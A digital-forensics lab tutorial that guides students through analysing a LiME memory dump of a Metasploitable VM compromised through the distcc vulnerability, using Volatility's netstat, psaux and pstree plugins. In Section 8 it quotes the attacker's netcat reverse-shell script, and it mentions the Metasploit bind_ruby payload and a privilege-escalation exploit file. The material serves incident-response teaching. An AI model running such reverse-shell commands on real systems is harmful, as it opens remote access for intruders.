Forensics Project:
Lesson 1)
{ Conduct Volatility
Analysis of Lime Memory Dump (distcc Exploit) }
Section 0. Background
Information |
- Metasploitable
- Pre-Requisite Lab
- Project Description
- The following lab will show you how to
analyze a lime memory dump of the distcc exploit with Volatility.
- What is distcc
- distcc is designed to speed up compilation
by taking advantage of unused processing power on other computers. A
machine with distcc installed can send code to be compiled across the
network to a computer which has the distccd daemon and a compatible
compiler installed.
- Exploit CVE 2004-2687
- distcc 2.x, as used in XCode 1.5 and
others, when not configured to restrict access to the server port,
allows remote attackers to execute arbitrary commands via compilation
jobs, which are executed by the server without authorization checks.
- Exploit CVE 2009-1185
Lab Notes
- In this lab we will do the following:
- Run an intense NMAP Scan on the Metasploitable
- Search for the distcc daemon
- Use Metasploit to exploit the distcc
- Use exploit
to escalate the privilege of the daemon user to root.
- Conduct Basic Network Forensics.
- Create a Lime Forensics Memory Dump.
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Section 1: Start
Up the Metasploitable VM |
- Start Up VMWare Player
- Instructions:
- Click the Start Button
- Type Vmplayer in the search box
- Click on VplayeMr
- Open a Virtual Machine
- Instructions:
- Click on Open a Virtual Machine
- Open the Metasploitable VM
- Instructions:
- Navigate to where the Metasploitable VM
is located
- Click on on the Metasploitable VM
- Click on the Open Button
- Edit the Metasploitable VM
- Instructions:
- Select Metasploitable2-Linux VM
- Click Edit virtual machine settings
- Edit the Metasploitable VM
- Instructions:
- Click on "Network Adapter NAT"
- Select the radio button "Bridged:
Connected directly to the physical network"
- Click on the OK button
- Warning:
- By changing from NAT to Bridged opens
the VM and network up to potential attacks.
- To maintain a safe network, you could
(1) skip this section and only use the host-only network, (2) unplug
your router from the internet, (3) use an ACL to not allow traffic
into your network, etc.
- Play the Metasploitable VM
- Instructions:
- Click on the Metasploitable VM
- Click on Play virtual machine
Section 2: Determine
Metasploitable IP Address |
- Logging into Metasploitable
- Instructions
- Username: msfadmin
- Password: msfadmin
or whatever you changed it to in lesson 1.
- Change the msfadmin password
- Instructions:
- ifconfig -a
- Note(FYI):
- This is the IP Address of the Victim
- My IP Address is
- Record your IP Address.
Section 3: Start
Up the BackTrack5R1 VM |
- Start Up VMWare Player
- Instructions:
- Click the Start Button
- Type Vmplayer in the search box
- Click on Vmplayer
- Open a Virtual Machine
- Instructions:
- Click on Open a Virtual Machine
- Open the BackTrack5R1 VM
- Instructions:
- Navigate to where the BackTrack5R1 VM
is located
- Click on on the BackTrack5R1 VM
- Click on the Open Button
- Edit the BackTrack5R1 VM
- Instructions:
- Select BackTrack5R1 VM
- Click Edit virtual machine settings
- Edit Virtual Machine Settings
- Instructions:
- Click on Network Adapter
- Click on the Bridged Radio button
- Click on the OK Button
- Play the BackTrack5R1 VM
- Instructions:
- Click on the BackTrack5R1 VM
- Click on Play virtual machine
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed
it to>.
- Bring up the GNOME
- Instructions:
- Type startx
- Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Obtain the IP Address
- Instructions:
- ifconfig -a
- Note(FYI):
- My IP address
- In your case, it will probably be
- This is the machine that will be use to
attack the victim machine (Metasploitable).
Section 4: Download Ubuntu 8:04 Volatility Profile and Lime Dump |
- Download Metasploitable (Ubuntu 8.04) Profile
(Perform on
- Note(FYI):
- Replace with the
Metasploitable IP Address obtained from (Section 2, Step 2).
- Instructions:
- cd /pentest/forensics/volatility-2.3.1/volatility/plugins/overlays/linux
- wget
- ls -l *.zip
- Download Dump Files
- Note(FYI):
- Replace with the
Metasploitable IP Address obtained from (Section 2, Step 2).
- Instructions:
- mkdir -p /var/tmp/DUMPS/
- cd /var/tmp/DUMPS
- wget -r --no-parent --no-host-directories
--reject "index.html*"
- Note(FYI):
- wget, is a non-interactive [webpage]
- -r, recursively retrieve.
- --no-parent, Do not ever ascend to
the parent directory when retrieving recursively. It
guarantees that only the files below a certain hierarchy will be
- --no-host-directories, Disable
generation of host-prefixed directories.
- --reject "index.html*",
reject any file that contains index.html*, where (*)
is a wildcard .
this is the website directory that I want to download.
- In summary, I want to recursively
download the distcc/ directory only, while ignoring any
index.html files.
- Download Dump Files
- Instructions:
- cd /var/tmp/DUMPS/distcc/
- ls -lSrh
- Note(FYI):
- ls, list directory contents.
- -lSrh,
use long listing.
- -lSrh,
sort by file size.
- -lSrh,
reverse order while sorting.
- -lSrh,
print sizes in human readable format (e.g., 1K 234M 2G).
Section 5: Test
Volatility Profile |
- Test Volatility Profile
on BackTrack)
- Instructions:
- ls -l /pentest/forensics/volatility-2.3.1/volatility/plugins/overlays/linux/
- cd /pentest/forensics/volatility-2.3.1
- python vol.py --info | grep -i ubuntu
- Record the case sensitive profile name.
(See Picture).
- In my case, it is
- Note(FYI):
- ls -l, show a long listing of what is
contained in the profiles directory. (You should see the
profile you created in
Metasploitable Project:
Lesson 1,
- If properly created, you should see the
Profile for Linux UBUNTU-MSF804.
- Volatility linux_ifconfig
- Instructions:
- python vol.py
-f /var/tmp/DUMPS/distcc/distcc_memory.lime
- Note(FYI):
prints the active interface information, including IPs, interface
name, MAC address, and whether the NIC is in promiscuous mode or not
specifies your Metasploitable Profile.
-f /var/tmp/DUMPS/distcc/distcc_memory.lime,
specifies the location of the lime memory dump.
Section 6: Volatility
Network Analysis |
- Volatility linux_netstat
- Instructions:
- python vol.py
-f /var/tmp/DUMPS/distcc/distcc_memory.lime
- Note(FYI):
mimics the netstat command on a live system. It leverages the
linux_lsof functionality to list open files in each process.
specifies your Metasploitable Profile.
-f /var/tmp/DUMPS/distcc/distcc_memory.lime,
specifies the location of the lime memory dump.
- Volatility linux_netstat (Analyze
- Instructions:
- python vol.py --profile
LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime
linux_netstat | egrep -i '(3632|4444)'
- Record your distcc Process ID.
Mine is 5698. (See Picture)
- Record your netcat Process ID.
Mine is 5777. (See Picture)
- Note(FYI):
egrep -i '(3632|4444)',
egrep will let me search for any lines that contains the 3632/distcc
-OR- 4444/netcat. The "-i" flag ignores the case.
- Every good forensics investigator must
learn how to tell a story. Below there are black arrows that
try to illustrate the attack chain.
- Black Arrow 1: Process distcc is
identified by its port number (3632), which is owned by process ID
- Black Arrow 2: Somehow we need
to find out how distcc spawned a TCP connection on port (4444) from
Metasploitable ( to BackTrack (
- Black Arrow 3 and 4, shows there
is a TCP port 4444 connection from Metasploitable ( to
BackTrack ( that is attached to a
shell (sh/5777),
which is scary.
- Comparing Volatility to Live Data Files
- Instructions:
- cd /pentest/forensics/volatility-2.3.1
- python vol.py --profile
LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime
linux_netstat | egrep '(3632|4444)'
- egrep '(3632|4444)' /var/tmp/DUMPS/distcc/distcc_netstat.txt
- egrep '(3632|4444)' /var/tmp/DUMPS/distcc/distcc_lsof.txt
- Note(FYI):
egrep '(3632|4444)',
egrep will let me search for any connections that contain TCP/3632/distcc
-OR- TCP/4444. Remember the distcc exploit uses the cmd/unix/bind_ruby
payload which continually listens for a connection and spawns a
command shell via Ruby which opens a TCP connection over port 4444.
- The distcc_netstat.txt was created in
the pre-requisite lab in (Section 8, Step 3, Instruction 2). The
file contains a network dump (netstat -naop) during the attack.
This file can be used to confirm the volatility results of the lime
dump, in which the ruby exploit is connected to TCP/4444.
- The distcc_lsof.txt was created in the
pre-requisite lab in (Section 8, Step 3, Instruction 3). The file
contains a lsof dump (lsof) during the attack. This file can
be used to confirm the volatility results of the lime dump, in which
the ruby exploit is connected to TCP/4444.
Section 7: Volatility
Process Analysis |
- Using Volatility linux_psaux (analyze ruby
- Instructions:
- python vol.py
-f /var/tmp/DUMPS/distcc/distcc_memory.lime
linux_psaux | grep
-i ruby
- grep -i ruby /var/tmp/DUMPS/distcc/distcc_pseaf.txt
- Note(FYI):
linux_psaux, prints the list of active processes.
specifies your Metasploitable Profile.
-f /var/tmp/DUMPS/distcc/distcc_memory.lime,
specifies the location of the lime memory dump.
grep -i ruby,
displays only processes that contain the name ruby.
- Remember the distcc exploit uses the cmd/unix/bind_ruby
payload which continually listens (ie. using while statements, see
picture) for a connection and spawns a
command shell via Ruby which opens a TCP connection over port 4444.
- This forensics file (distcc_pseaf.txt)
was created by dumping all the live (at the time) processes around
the same time we created the lime memory dump. In Instruction
#2, the command serves to demonstrate that live file displays the
same results as Volatility.
- Using Volatility linux_pstree (Create File)
- Instructions:
- python vol.py
-f /var/tmp/DUMPS/distcc/distcc_memory.lime
linux_pstree | tee /var/tmp/DUMPS/distcc/linux_pstree.txt
- Note(FYI):
linux_pstree, This displays processes using a tree form.
Child processes are indicated by using indentation and periods.
specifies your Metasploitable Profile.
-f /var/tmp/DUMPS/distcc/distcc_memory.lime,
specifies the location of the lime memory dump.
tee /var/tmp/DUMPS/distcc/linux_pstree.txt,
tee allows a user to view standard output while creating a file.
- Open linux_pstree.txt
- Note(FYI):
- Remember that we are analyzing the
distcc exploit, in which secondary attack was engaged on NETLINK by
sending a NETLINK message from the user space (/tmp/run).
This step shows how we can get one step closer to the process that
executed the shell (sh).
- Instructions:
- gedit /var/tmp/DUMPS/distcc/linux_pstree.txt
- gedit is a text editor for the
GNOME Desktop.
- Click the Magnifying Glass.
- Search for:
Provide your recorded
Netcat PID found in (Section 6, Step 2, Instruction 3).
Do not use 5777!!!
- Click the Find Button
- Record the (.run) Parent Process ID (See
Picture and below note).
- In my case, the PID for (.run)
is 5776.
- Minimize gedit
- Note(FYI):
- The PID for my TCP/4444 session is 5777.
This PID (5777) is linked to the process (..sh).
The two dots (..) signifies that this process is a child of the
parent process directly above it (.run).
Remember the secondary exploit (/tmp/run),
executes the netcat command that was spawned by a root shell (/bin/sh).
- Using Volatility linux_psaux
- Instructions:
- python vol.py --profile
LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime
linux_psaux | grep
- Replace PID (5776)
with your PID obtained from (Section 6, Step 4, Instruction 4).
- Note(FYI):
linux_psaux, prints the list of active processes. This
is a plugin subclass of linux_pslist.
- In my case, PID (5776)
is associated with /bin/sh /tmp/run, which is owned by UID (0).
In other words, somehow the daemon user managed to escalate their
privilege by executing /tmp/run which spawned a
root shell.
Section 8: Analyzing
tmp files |
- Analyzing tmp files
- Note(FYI):
- Instructions:
- cd /var/tmp/DUMPS/distcc/
- tar zxvf tmp.tar.gz
- cd tmp
- ls -la
- Note(FYI):
- This is where you stored the forensic
distcc files.
- tar zcvf, Here we use tar to un-zip the
tmp.tar.gz archive file.
- z, use un-zip the archive.
- v, verbosely list files processed
- x, extract archive.
- o, maintain permissions.
- f, specify archive file, directory
or device
- This tmp directory contains the
contents from the Ubuntu tmp directory.
- ls -la, look at all the files in the
tmp directory.
- Notice the run and exploit-8572.c
- Capturing the Flag
- Note(FYI):
- The goal here is to understand what /tmp/run
was doing -AND- to know how it was kicked off.
- Instructions:
- cat run
- grep run *
- Note(FYI):
- cat run, This will display the contents
of the run file.
- #!/bin/sh, This is a shebang
directive telling Linux this is a shell script.
- /bin/netcat -e /bin/sh 4444, This mean netcat will connect to IP
Address( on Port(4444) -AND- spawn a shell.
- grep run *, This means to search
anything else in the tmp directory for the string run. By
itself, the run executable would only run as the daemon user, so
something had to escalate the daemon user privilege to the root
user. That something was the compiled version of
- Proof of Lab (On
- Note(FYI):
- The following commands will be placed
in the lower terminal window.
- Instructions:
- cd /pentest/forensics/volatility-2.3.1
- python vol.py --profile
LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime
linux_netstat | grep "sh/"
- python vol.py --profile
LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime
linux_psaux | grep "/tmp/run"
- cat /var/tmp/DUMPS/distcc/tmp/run
- echo "Your Name"
- Replace the string "Your Name" with
your actual name.
- e.g., echo "John Gray"
Proof of Lab
- Press the <Ctrl> and <Alt> key at the
same time.
- Press the <PrtScn> key.
- Paste into a word document
- Upload to Moodle